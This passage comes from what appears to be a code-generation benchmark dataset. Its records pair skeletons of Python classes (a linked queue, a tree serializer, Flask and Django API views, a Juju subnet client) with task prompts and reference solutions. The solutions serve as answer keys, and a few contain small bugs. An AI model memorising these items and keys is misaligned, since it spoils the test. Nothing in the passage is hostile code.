:return:\"\"\"\n <|body_3|>\n\n def concatenate(self, Q):\n \"\"\"takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LinkedQueue:\n \"\"\"FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\"\"\"\n\n def first(self):\n \"\"\"return __but do not remove__ the element at the front of the queue :return:\"\"\"\n if self.is_empty():\n raise Empty('Queue is empty')\n return self._head._element\n\n def dequeue(self):\n \"\"\"remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\"\"\"\n if self.is_empty():\n raise Empty('Queue is empty')\n answer = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return answer\n\n def enqueue(self, element):\n \"\"\"add an element to the back of queue :param element: :return:\"\"\"\n newest = self._Node(element, None)\n if self.is_empty():\n self._head = newest\n else:\n self._tail._next = newest\n self._tail = newest\n self._size += 1\n\n def rotate(self):\n \"\"\"rotate front element to the back of the queue :return:\"\"\"\n if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head\n\n def concatenate(self, Q):\n \"\"\"takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. 
run in O(1) result in Q being an empty queue :param Q: :return:\"\"\"\n assert isinstance(Q, LinkedQueue)\n if self.is_empty():\n self._head = Q._head\n else:\n self._tail._next = Q._head\n Q._head = None\n", "source": "the_stack_v2_python_sparse", "source_path": "exercises/ch08_trees/LinkedQueue.py", "source_repo": "rarezhang/data_structures_and_algorithms_in_python", "split": "test", "star_events_count": 0} {"blob_id": "4b21f623501ef2b4eae6d072f9bf3119a3e067f1", "bodies": ["res = []\nif not root:\n return []\nq = collections.deque([root])\nwhile q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\nreturn ','.join(res)", "if not data:\n return None\ndata = data.split(',')\nif not data:\n return ''\ni = 0\nroot = TreeNode(int(data[i]))\nq = collections.deque([root])\nwhile q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\nreturn root"], "bodies_text": "<|body_start_0|>\n res = []\n if not root:\n return []\n q = collections.deque([root])\n while q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n data = data.split(',')\n if not data:\n return ''\n i = 0\n root = TreeNode(int(data[i]))\n q = collections.deque([root])\n while q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = []\n if not root:\n return []\n q = collections.deque([root])\n while q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n data = data.split(',')\n if not data:\n return ''\n i = 0\n root = TreeNode(int(data[i]))\n q = collections.deque([root])\n while q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000130", "length_bytes": 3153, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: TreeNode :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. 
:type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006077", "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = []\n if not root:\n return []\n q = collections.deque([root])\n while q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n data = data.split(',')\n if not data:\n return ''\n i = 0\n root = TreeNode(int(data[i]))\n q = collections.deque([root])\n while q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\n return root\n<|end_body_1|>\n", "revision_id": "fc1b0bec0e28d31e9a6ff722b3a66eacb0278148", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n res = []\n if not root:\n return []\n q = collections.deque([root])\n while q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\n return ','.join(res)\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. 
:type data: str :rtype: TreeNode\"\"\"\n if not data:\n return None\n data = data.split(',')\n if not data:\n return ''\n i = 0\n root = TreeNode(int(data[i]))\n q = collections.deque([root])\n while q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "树/297二叉树的序列化与反序列化.py", "source_repo": "LeopoldACC/Algorithm", "split": "test", "star_events_count": 2} {"blob_id": "766430e6d7e04403ec26164a43921eafdef2428f", "bodies": ["st = Study.query.get(kf_id)\nif st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\nreturn StudySchema().jsonify(st)", "body = request.get_json(force=True)\nst = Study.query.get(kf_id)\nif st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\ntry:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\nexcept ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\ndb.session.add(st)\ndb.session.commit()\nreturn (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)", "st = Study.query.get(kf_id)\nif st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\ndb.session.delete(st)\ndb.session.commit()\nreturn (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)"], "bodies_text": "<|body_start_0|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n return StudySchema().jsonify(st)\n<|end_body_0|>\n\n<|body_start_1|>\n body = request.get_json(force=True)\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n try:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\n except ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\n db.session.add(st)\n db.session.commit()\n return (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_1|>\n\n<|body_start_2|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n db.session.delete(st)\n db.session.commit()\n return (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_2|>\n", "class_docstring": "Study API", "class_name": "StudyAPI", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StudyAPI:\n \"\"\"Study API\"\"\"\n\n def get(self, kf_id):\n \"\"\"Get a study by id --- template: path: get_by_id.yml properties: resource: Study\"\"\"\n <|body_0|>\n\n def patch(self, kf_id):\n \"\"\"Update an existing study. 
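The Codec record above implements BFS (level-order) serialization with explicit 'null' markers. A quick round-trip check, assuming the record's `Codec` plus `import collections` are in scope; the `TreeNode` shape below mirrors the usual LeetCode definition and is an assumption, since the record does not define it.

import collections

class TreeNode:  # assumed shape; not part of the record
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

root = TreeNode(1, TreeNode(2), TreeNode(3, TreeNode(4), TreeNode(5)))
codec = Codec()
data = codec.serialize(root)
# BFS emits both children of every visited node, so leaves contribute trailing
# 'null's: '1,2,3,null,null,4,5,null,null,null,null'
copy = codec.deserialize(data)
assert codec.serialize(copy) == data  # the round trip is stable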
Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\"\"\"\n <|body_1|>\n\n def delete(self, kf_id):\n \"\"\"Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n return StudySchema().jsonify(st)\n<|end_body_0|>\n\n<|body_start_1|>\n body = request.get_json(force=True)\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n try:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\n except ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\n db.session.add(st)\n db.session.commit()\n return (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_1|>\n\n<|body_start_2|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n db.session.delete(st)\n db.session.commit()\n return (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000131", "length_bytes": 3738, "license_type": "permissive", "methods": [{"docstring": "Get a study by id --- template: path: get_by_id.yml properties: resource: Study", "name": "get", "signature": "def get(self, kf_id)"}, {"docstring": "Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study", "name": "patch", "signature": "def patch(self, kf_id)"}, {"docstring": "Delete study by id --- template: path: delete_by_id.yml properties: resource: Study", "name": "delete", "signature": "def delete(self, kf_id)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007371", "prompt": "Implement the Python class `StudyAPI` described below.\n\nClass description:\nStudy API\n\nMethod signatures and docstrings:\n- def get(self, kf_id): Get a study by id --- template: path: get_by_id.yml properties: resource: Study\n- def patch(self, kf_id): Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\n- def delete(self, kf_id): Delete study by id --- template: path: delete_by_id.yml properties: resource: Study", "prompted_full_text": "Implement the Python class `StudyAPI` described below.\n\nClass description:\nStudy API\n\nMethod signatures and docstrings:\n- def get(self, kf_id): Get a study by id --- template: path: get_by_id.yml properties: resource: Study\n- def patch(self, kf_id): Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\n- def delete(self, kf_id): Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\n\n<|skeleton|>\nclass StudyAPI:\n \"\"\"Study API\"\"\"\n\n def get(self, kf_id):\n \"\"\"Get a study by id --- template: path: get_by_id.yml properties: resource: Study\"\"\"\n <|body_0|>\n\n def patch(self, kf_id):\n \"\"\"Update an existing study. 
Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\"\"\"\n <|body_1|>\n\n def delete(self, kf_id):\n \"\"\"Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n return StudySchema().jsonify(st)\n<|end_body_0|>\n\n<|body_start_1|>\n body = request.get_json(force=True)\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n try:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\n except ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\n db.session.add(st)\n db.session.commit()\n return (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_1|>\n\n<|body_start_2|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n db.session.delete(st)\n db.session.commit()\n return (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_2|>\n", "revision_id": "36ee3fc3d1ba9d1a177274d051fb175c56dd898e", "skeleton": "<|skeleton|>\nclass StudyAPI:\n \"\"\"Study API\"\"\"\n\n def get(self, kf_id):\n \"\"\"Get a study by id --- template: path: get_by_id.yml properties: resource: Study\"\"\"\n <|body_0|>\n\n def patch(self, kf_id):\n \"\"\"Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\"\"\"\n <|body_1|>\n\n def delete(self, kf_id):\n \"\"\"Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StudyAPI:\n \"\"\"Study API\"\"\"\n\n def get(self, kf_id):\n \"\"\"Get a study by id --- template: path: get_by_id.yml properties: resource: Study\"\"\"\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n return StudySchema().jsonify(st)\n\n def patch(self, kf_id):\n \"\"\"Update an existing study. 
Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\"\"\"\n body = request.get_json(force=True)\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n try:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\n except ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\n db.session.add(st)\n db.session.commit()\n return (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)\n\n def delete(self, kf_id):\n \"\"\"Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\"\"\"\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n db.session.delete(st)\n db.session.commit()\n return (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)\n", "source": "the_stack_v2_python_sparse", "source_path": "dataservice/api/study/resources.py", "source_repo": "kids-first/kf-api-dataservice", "split": "test", "star_events_count": 9} {"blob_id": "d97de1797a8f6fd2c8d495aa144edbf2e8c1a33a", "bodies": ["is_existed = validated_data['is_existed']\ncode = validated_data['code']\nnew_phone = validated_data['phone']\nif is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\nelse:\n is_success = cache.check_code(new_phone, code)\nif is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\nreturn False", "is_existed = validated_data['is_existed']\ncode = validated_data['code']\nnew_email = validated_data['email']\nif is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\nelse:\n is_success = cache.check_code(new_email, code)\nif is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\nreturn False", "func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\nfunc = func_list.get(way)\nbind = getattr(self, func)\nreturn bind(self.redis, instance, validated_data)", "serializer = self.get_serializer(data=request.data)\nserializer.is_valid(raise_exception=True)\nway = serializer.validated_data.get('way')\nbind_success = self.factory(way, serializer.validated_data, request.user)\nif bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\nreturn Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)"], "bodies_text": "<|body_start_0|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_phone = validated_data['phone']\n if is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\n else:\n is_success = cache.check_code(new_phone, code)\n if is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_email = validated_data['email']\n if is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\n else:\n is_success = cache.check_code(new_email, code)\n if is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n 
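The StudyAPI record follows the usual Flask-RESTful resource pattern: look up by `kf_id`, abort with 404 if missing, then serialize, partially update, or delete. A hypothetical client-side pass over the three verbs; the base URL, port, and `kf_id` value are invented for illustration and do not come from the record.

import requests

BASE = 'http://localhost:5000/studies'   # assumed mount point, not stated in the record
kf_id = 'SD_00000000'                    # invented Kids First-style identifier

r = requests.get(f'{BASE}/{kf_id}')                          # StudySchema JSON, or 404
r = requests.patch(f'{BASE}/{kf_id}', json={'name': 'new'})  # partial update; 400 on a bad body
r = requests.delete(f'{BASE}/{kf_id}')                       # 200 with a 'study ... deleted' message
print(r.status_code, r.json())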
consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\n func = func_list.get(way)\n bind = getattr(self, func)\n return bind(self.redis, instance, validated_data)\n<|end_body_2|>\n\n<|body_start_3|>\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n way = serializer.validated_data.get('way')\n bind_success = self.factory(way, serializer.validated_data, request.user)\n if bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\n return Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n<|end_body_3|>\n", "class_docstring": "绑定(改绑)用户邮箱或者手机号 需发送验证码验证", "class_name": "BindEmailOrPhone", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BindEmailOrPhone:\n \"\"\"绑定(改绑)用户邮箱或者手机号 需发送验证码验证\"\"\"\n\n def bind_phone(cache, instance, validated_data):\n \"\"\"改绑手机号\"\"\"\n <|body_0|>\n\n def bind_email(cache, instance, validated_data):\n \"\"\"改绑邮箱\"\"\"\n <|body_1|>\n\n def factory(self, way, validated_data, instance):\n \"\"\"简单工厂管理手机号和邮箱的改绑\"\"\"\n <|body_2|>\n\n def put(self, request):\n \"\"\"改绑OR绑定用户的手机或者邮箱\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_phone = validated_data['phone']\n if is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\n else:\n is_success = cache.check_code(new_phone, code)\n if is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_email = validated_data['email']\n if is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\n else:\n is_success = cache.check_code(new_email, code)\n if is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\n func = func_list.get(way)\n bind = getattr(self, func)\n return bind(self.redis, instance, validated_data)\n<|end_body_2|>\n\n<|body_start_3|>\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n way = serializer.validated_data.get('way')\n bind_success = self.factory(way, serializer.validated_data, request.user)\n if bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\n return Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000132", "length_bytes": 28563, "license_type": "permissive", "methods": [{"docstring": "改绑手机号", "name": "bind_phone", "signature": "def bind_phone(cache, instance, validated_data)"}, {"docstring": "改绑邮箱", "name": "bind_email", "signature": "def bind_email(cache, instance, validated_data)"}, {"docstring": "简单工厂管理手机号和邮箱的改绑", "name": "factory", "signature": "def factory(self, way, validated_data, instance)"}, {"docstring": "改绑OR绑定用户的手机或者邮箱", "name": "put", "signature": "def put(self, request)"}], "n_methods": 4, 
"original_id": "stack_v2_sparse_classes_30k_train_002513", "prompt": "Implement the Python class `BindEmailOrPhone` described below.\n\nClass description:\n绑定(改绑)用户邮箱或者手机号 需发送验证码验证\n\nMethod signatures and docstrings:\n- def bind_phone(cache, instance, validated_data): 改绑手机号\n- def bind_email(cache, instance, validated_data): 改绑邮箱\n- def factory(self, way, validated_data, instance): 简单工厂管理手机号和邮箱的改绑\n- def put(self, request): 改绑OR绑定用户的手机或者邮箱", "prompted_full_text": "Implement the Python class `BindEmailOrPhone` described below.\n\nClass description:\n绑定(改绑)用户邮箱或者手机号 需发送验证码验证\n\nMethod signatures and docstrings:\n- def bind_phone(cache, instance, validated_data): 改绑手机号\n- def bind_email(cache, instance, validated_data): 改绑邮箱\n- def factory(self, way, validated_data, instance): 简单工厂管理手机号和邮箱的改绑\n- def put(self, request): 改绑OR绑定用户的手机或者邮箱\n\n<|skeleton|>\nclass BindEmailOrPhone:\n \"\"\"绑定(改绑)用户邮箱或者手机号 需发送验证码验证\"\"\"\n\n def bind_phone(cache, instance, validated_data):\n \"\"\"改绑手机号\"\"\"\n <|body_0|>\n\n def bind_email(cache, instance, validated_data):\n \"\"\"改绑邮箱\"\"\"\n <|body_1|>\n\n def factory(self, way, validated_data, instance):\n \"\"\"简单工厂管理手机号和邮箱的改绑\"\"\"\n <|body_2|>\n\n def put(self, request):\n \"\"\"改绑OR绑定用户的手机或者邮箱\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_phone = validated_data['phone']\n if is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\n else:\n is_success = cache.check_code(new_phone, code)\n if is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_email = validated_data['email']\n if is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\n else:\n is_success = cache.check_code(new_email, code)\n if is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\n func = func_list.get(way)\n bind = getattr(self, func)\n return bind(self.redis, instance, validated_data)\n<|end_body_2|>\n\n<|body_start_3|>\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n way = serializer.validated_data.get('way')\n bind_success = self.factory(way, serializer.validated_data, request.user)\n if bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\n return Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n<|end_body_3|>\n", "revision_id": "13cb59130d15e782f78bc5148409bef0f1c516e0", "skeleton": "<|skeleton|>\nclass BindEmailOrPhone:\n \"\"\"绑定(改绑)用户邮箱或者手机号 需发送验证码验证\"\"\"\n\n def bind_phone(cache, instance, validated_data):\n \"\"\"改绑手机号\"\"\"\n <|body_0|>\n\n def bind_email(cache, instance, validated_data):\n \"\"\"改绑邮箱\"\"\"\n <|body_1|>\n\n def factory(self, way, validated_data, instance):\n \"\"\"简单工厂管理手机号和邮箱的改绑\"\"\"\n <|body_2|>\n\n def put(self, request):\n \"\"\"改绑OR绑定用户的手机或者邮箱\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class 
BindEmailOrPhone:\n \"\"\"绑定(改绑)用户邮箱或者手机号 需发送验证码验证\"\"\"\n\n def bind_phone(cache, instance, validated_data):\n \"\"\"改绑手机号\"\"\"\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_phone = validated_data['phone']\n if is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\n else:\n is_success = cache.check_code(new_phone, code)\n if is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n\n def bind_email(cache, instance, validated_data):\n \"\"\"改绑邮箱\"\"\"\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_email = validated_data['email']\n if is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\n else:\n is_success = cache.check_code(new_email, code)\n if is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n\n def factory(self, way, validated_data, instance):\n \"\"\"简单工厂管理手机号和邮箱的改绑\"\"\"\n func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\n func = func_list.get(way)\n bind = getattr(self, func)\n return bind(self.redis, instance, validated_data)\n\n def put(self, request):\n \"\"\"改绑OR绑定用户的手机或者邮箱\"\"\"\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n way = serializer.validated_data.get('way')\n bind_success = self.factory(way, serializer.validated_data, request.user)\n if bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\n return Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n", "source": "the_stack_v2_python_sparse", "source_path": "user_app/views/personal_api.py", "source_repo": "lmyfzx/Django-Mall", "split": "test", "star_events_count": 0} {"blob_id": "97ff6f91fd2202e87bbf9d0d1f08b340b27f2fa8", "bodies": ["_params = dict()\nmsg = dict(type='Subnets', request='AllZones', version=5, params=_params)\nreply = await self.rpc(msg)\nreturn reply", "if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\nif zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n_params = dict()\nmsg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n_params['space-tag'] = space_tag\n_params['zone'] = zone\nreply = await self.rpc(msg)\nreturn reply", "if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n_params = dict()\nmsg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n_params['cidrs'] = cidrs\nreply = await self.rpc(msg)\nreturn reply"], "bodies_text": "<|body_start_0|>\n _params = dict()\n msg = dict(type='Subnets', request='AllZones', version=5, params=_params)\n reply = await self.rpc(msg)\n return reply\n<|end_body_0|>\n\n<|body_start_1|>\n if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\n if zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n 
